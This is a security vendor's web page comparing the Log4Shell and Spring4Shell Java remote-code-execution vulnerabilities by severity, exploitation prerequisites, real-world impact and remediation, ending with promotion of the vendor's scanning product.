JavaRCESupply Chain

Log4Shell vs Spring4Shell

Verified by Precogs Threat Research

Two "Shell" vulnerabilities in the Java ecosystem, disclosed months apart. The media initially panicked over Spring4Shell as a "second Log4Shell." In reality, their actual risk profiles differ enormously — and the naming similarity created confusion that cost security teams valuable triage time. Understanding why requires examining their exploitation prerequisites.

CVE · 2021

Log4Shell

CVE-2021-44228

10.0CRITICAL

Attack VectorNetwork — any input that gets logged triggers JNDI lookup

ImpactFull RCE on any Java application using Log4j 2.x for logging

Affected SystemsAny Java application using Apache Log4j 2.0–2.14.1

Exploit AvailabilityTrivially exploitable, weaponized within hours

Remediation ComplexityMedium — upgrade library, find transitive deps

Real-World ImpactMassive global exploitation campaign, nation-state weaponization

AI Code
Learn more about Log4Shell →

CVE · 2022

Spring4Shell

CVE-2022-22965

9.8CRITICAL

Attack VectorNetwork — class loader parameter manipulation via data binding

ImpactRCE via webshell upload, but only under specific deployment configurations

Affected SystemsSpring Framework 5.3.0–5.3.17 on JDK 9+ with Tomcat WAR deployment

Exploit AvailabilityPublic PoC available, but requires precise conditions

Remediation ComplexityLow — upgrade Spring Framework

Real-World ImpactLimited mass exploitation due to specific prerequisites. Mostly targeted attacks.

AI Code
Learn more about Spring4Shell →

🏆 Verdict

Log4Shell is far more dangerous by every measurable metric. Spring4Shell requires a very specific four-way conjunction: Spring MVC + JDK 9+ + Tomcat + WAR deployment (not the common JAR deployment). This limits its attack surface to approximately 5-10% of Spring applications. Log4Shell, by contrast, works against virtually any Java application using Log4j 2.x for logging — which includes approximately 35% of all Java applications globally. Log4Shell was actively exploited by APT groups including Aquatic Panda and Hafnium; Spring4Shell saw mostly opportunistic scanning with limited confirmed compromises.

🔍 Key Insights

The "Spring4Shell" name was coined by researchers on Twitter before the vulnerability was fully analyzed, creating premature panic. The actual CVE (CVE-2022-22965) was confirmed only after a leaked Chinese-language PoC circulated on social media, highlighting how social media-driven disclosure accelerates but also distorts vulnerability triage.

Spring4Shell's exploitation requires manipulating the classLoader property through Spring MVC data binding — a technique that had been partially mitigated in previous Spring versions but resurfaced due to JDK 9's module system exposing new accessible properties.

This comparison illustrates a common security team challenge: vulnerability naming hype can cause misallocation of resources. Organizations that deprioritized Log4Shell patching to focus on Spring4Shell (due to media coverage timing) exposed themselves to significantly higher actual risk.

At a Glance

Attribute	Log4Shell	Spring4Shell
Severity	CRITICAL (10.0)	CRITICAL (9.8)
Category	Remote Code Execution	Remote Code Execution
Year	2021	2022
Remediation	Medium	Low
Precogs Domain	AI Code	AI Code

Detect Both in Your Codebase

Precogs AI scans source code, compiled binaries, and AI-generated code for both vulnerability classes — automatically.

Start Free Scan

Log4Shell

Spring4Shell

🏆 Verdict

🔍 Key Insights

At a Glance

Detect Both in Your Codebase

More Comparisons

Log4Shell vs Heartbleed

XSS vs CSRF

SQL Injection vs XSS

SAST vs DAST

AI Code Vulnerabilities vs Traditional Vulnerabilities

Hardcoded Secrets vs Data Leaks